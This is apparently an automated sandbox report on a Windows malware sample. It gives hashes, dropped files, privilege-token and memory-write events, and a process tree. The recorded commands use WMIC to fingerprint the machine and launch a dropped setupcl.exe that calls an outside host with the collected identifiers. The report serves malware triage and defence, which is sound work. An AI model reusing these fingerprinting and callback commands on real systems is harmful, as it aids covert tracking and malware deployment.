0539fe12e81883635ede57ed022cbbe907483982ef0079ba5b5280611deb4e9f

Analysis

max time kernel
122s
max time network
129s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
28/12/2023, 22:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
Size

220KB
MD5

fb39e39e10b6cfb00ba27d04d7e7e6ef
SHA1

d090dc5cf66666bf8a5e95648f7b82cf4d3e77ee
SHA256

0539fe12e81883635ede57ed022cbbe907483982ef0079ba5b5280611deb4e9f
SHA512

333c785c03a706110e102c9289b78089326895877588b8b4756d3403454409394e8c3a234bd869163ae5c56b03d72a236e4c58fdeb1761bee22fa8dc04769083
SSDEEP

6144:/A0m3j0osTvFnsGg3MyS8yaPYkTHdUR73yCGn:/A0ij0oszFnsGe/S8P3Bgi

Score

7^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
2828	Fri4775.exe
2100	setupcl.exe

Loads dropped DLL 11 IoCs

pid	Process
2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
2100	setupcl.exe
2100	setupcl.exe
2100	setupcl.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe
Token: SeSecurityPrivilege	2216	WMIC.exe
Token: SeTakeOwnershipPrivilege	2216	WMIC.exe
Token: SeLoadDriverPrivilege	2216	WMIC.exe
Token: SeSystemProfilePrivilege	2216	WMIC.exe
Token: SeSystemtimePrivilege	2216	WMIC.exe
Token: SeProfSingleProcessPrivilege	2216	WMIC.exe
Token: SeIncBasePriorityPrivilege	2216	WMIC.exe
Token: SeCreatePagefilePrivilege	2216	WMIC.exe
Token: SeBackupPrivilege	2216	WMIC.exe
Token: SeRestorePrivilege	2216	WMIC.exe
Token: SeShutdownPrivilege	2216	WMIC.exe
Token: SeDebugPrivilege	2216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2216	WMIC.exe
Token: SeRemoteShutdownPrivilege	2216	WMIC.exe
Token: SeUndockPrivilege	2216	WMIC.exe
Token: SeManageVolumePrivilege	2216	WMIC.exe
Token: 33	2216	WMIC.exe
Token: 34	2216	WMIC.exe
Token: 35	2216	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2216	WMIC.exe
Token: SeSecurityPrivilege	2216	WMIC.exe
Token: SeTakeOwnershipPrivilege	2216	WMIC.exe
Token: SeLoadDriverPrivilege	2216	WMIC.exe
Token: SeSystemProfilePrivilege	2216	WMIC.exe
Token: SeSystemtimePrivilege	2216	WMIC.exe
Token: SeProfSingleProcessPrivilege	2216	WMIC.exe
Token: SeIncBasePriorityPrivilege	2216	WMIC.exe
Token: SeCreatePagefilePrivilege	2216	WMIC.exe
Token: SeBackupPrivilege	2216	WMIC.exe
Token: SeRestorePrivilege	2216	WMIC.exe
Token: SeShutdownPrivilege	2216	WMIC.exe
Token: SeDebugPrivilege	2216	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2216	WMIC.exe
Token: SeRemoteShutdownPrivilege	2216	WMIC.exe
Token: SeUndockPrivilege	2216	WMIC.exe
Token: SeManageVolumePrivilege	2216	WMIC.exe
Token: 33	2216	WMIC.exe
Token: 34	2216	WMIC.exe
Token: 35	2216	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2520	WMIC.exe
Token: SeSecurityPrivilege	2520	WMIC.exe
Token: SeTakeOwnershipPrivilege	2520	WMIC.exe
Token: SeLoadDriverPrivilege	2520	WMIC.exe
Token: SeSystemProfilePrivilege	2520	WMIC.exe
Token: SeSystemtimePrivilege	2520	WMIC.exe
Token: SeProfSingleProcessPrivilege	2520	WMIC.exe
Token: SeIncBasePriorityPrivilege	2520	WMIC.exe
Token: SeCreatePagefilePrivilege	2520	WMIC.exe
Token: SeBackupPrivilege	2520	WMIC.exe
Token: SeRestorePrivilege	2520	WMIC.exe
Token: SeShutdownPrivilege	2520	WMIC.exe
Token: SeDebugPrivilege	2520	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2520	WMIC.exe
Token: SeRemoteShutdownPrivilege	2520	WMIC.exe
Token: SeUndockPrivilege	2520	WMIC.exe
Token: SeManageVolumePrivilege	2520	WMIC.exe
Token: 33	2520	WMIC.exe
Token: 34	2520	WMIC.exe
Token: 35	2520	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2520	WMIC.exe
Token: SeSecurityPrivilege	2520	WMIC.exe
Token: SeTakeOwnershipPrivilege	2520	WMIC.exe
Token: SeLoadDriverPrivilege	2520	WMIC.exe

Suspicious use of SetWindowsHookEx 2 IoCs

pid	Process
2100	setupcl.exe
2100	setupcl.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 2796 wrote to memory of 2216	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	27
PID 2796 wrote to memory of 2216	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	27
PID 2796 wrote to memory of 2216	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	27
PID 2796 wrote to memory of 2216	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	27
PID 2796 wrote to memory of 2520	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	30
PID 2796 wrote to memory of 2520	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	30
PID 2796 wrote to memory of 2520	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	30
PID 2796 wrote to memory of 2520	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	30
PID 2796 wrote to memory of 2536	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	32
PID 2796 wrote to memory of 2536	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	32
PID 2796 wrote to memory of 2536	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	32
PID 2796 wrote to memory of 2536	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	32
PID 2796 wrote to memory of 2544	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	34
PID 2796 wrote to memory of 2544	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	34
PID 2796 wrote to memory of 2544	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	34
PID 2796 wrote to memory of 2544	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	34
PID 2796 wrote to memory of 2828	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	36
PID 2796 wrote to memory of 2828	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	36
PID 2796 wrote to memory of 2828	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	36
PID 2796 wrote to memory of 2828	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	36
PID 2796 wrote to memory of 2100	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	38
PID 2796 wrote to memory of 2100	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	38
PID 2796 wrote to memory of 2100	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	38
PID 2796 wrote to memory of 2100	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	38
PID 2796 wrote to memory of 2100	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	38
PID 2796 wrote to memory of 2100	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	38
PID 2796 wrote to memory of 2100	2796	fb39e39e10b6cfb00ba27d04d7e7e6ef.exe	38
PID 2100 wrote to memory of 1000	2100	setupcl.exe	39
PID 2100 wrote to memory of 1000	2100	setupcl.exe	39
PID 2100 wrote to memory of 1000	2100	setupcl.exe	39
PID 2100 wrote to memory of 1000	2100	setupcl.exe	39
PID 2100 wrote to memory of 1000	2100	setupcl.exe	39
PID 2100 wrote to memory of 1000	2100	setupcl.exe	39
PID 2100 wrote to memory of 1000	2100	setupcl.exe	39

C:\Users\Admin\AppData\Local\Temp\fb39e39e10b6cfb00ba27d04d7e7e6ef.exe
"C:\Users\Admin\AppData\Local\Temp\fb39e39e10b6cfb00ba27d04d7e7e6ef.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2796
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get UUID /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2216
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get SerialNumber /FORMAT:textvaluelist.xsl
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:2520
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC bios Get Version /FORMAT:textvaluelist.xsl
  2⤵
  PID:2536
- C:\Windows\SysWOW64\Wbem\WMIC.exe
  WMIC csproduct Get Name /FORMAT:textvaluelist.xsl
  2⤵
  PID:2544
- C:\Users\Admin\AppData\Local\Temp\nsd7D7B.tmp\Fri4775.exe
  Fri4775.exe -y -p"9bba59a244937971548c5c59716d45f7"
  2⤵
  - Executes dropped EXE
  PID:2828
- C:\Users\Admin\AppData\Local\Temp\nsd7D7B.tmp\setupcl.exe
  "C:\Users\Admin\AppData\Local\Temp\nsd7D7B.tmp\setupcl.exe" /initurl http://sub.zwickna.com/init/fb39e39e10b6cfb00ba27d04d7e7e6ef/:uid:? /affid "-" /id "0" /name " " /uniqid fb39e39e10b6cfb00ba27d04d7e7e6ef /uuid 00000000-0000-0000-0000-000000000000 /biosserial /biosversion ROCKS - 1 /csname Standard PC (Q35 + ICH9, 2009)
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:2100
- - C:\Windows\SysWOW64\Wbem\wmic.exe
    wmic bios get serialnumber, version
    3⤵
    PID:1000

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Local\Temp\nsd7D7B.tmp\Fri4775.exe

Filesize
233KB

MD5
dbb561dc5a9e16ef00bf406ad3bff7e0

SHA1
293b4efe0e428700326ea064c4dd92def491e696

SHA256
3afe001c7254a681b45f11ec5bde6510c8d82f4c177c8fbe8a92e3d885502551

SHA512
9bc7f99a49ecbd5f35d3a6fa78d8f53a032f68e8d78f72ad3499603867bc036672b15a820c863809751c61dbf35a5f1866d938b00e83f0d77c62a15abd54fe99

Download Submit
\Users\Admin\AppData\Local\Temp\nsd7D7B.tmp\nsExec.dll

Filesize
8KB

MD5
b8be6632a7dc8136ff01338be40fe701

SHA1
043fa16929b2af5ed5c1c59b4035a10cf765fb43

SHA256
289786fe13801467653eb2712f47f162d6fd3fc2d844be342282f75fc2b2a085

SHA512
403474154ff8500e5aae2b4466c652e5d066af2c55d8f158e6f007492ceb1f3abcc6cca80842b90900db02db4258ddcda75dec1d1799af24969c35811891e5b8

Download Submit
\Users\Admin\AppData\Local\Temp\nsd7D7B.tmp\setupcl.exe

Filesize
201KB

MD5
510d57697b88421f4fe91a3b2e6a3995

SHA1
e5d3e6b056db9761ef5ad8d91d6d50b2d1769e50

SHA256
9fac6a1b72726c32a5afab461347b013e21fbdfcd948faf62cedab6d8bc08400

SHA512
3c99e7392a7743fdbfd27f6ee9e9d4223b353cbdc719764b2ed0c534d8a7a7ac02422d80e9aee8f721caedb53d9691ff4cd0162282b0a85757145816b24ce08f

Download Submit
memory/2796-38-0x0000000000400000-0x0000000000437000-memory.dmp

Filesize
220KB

Download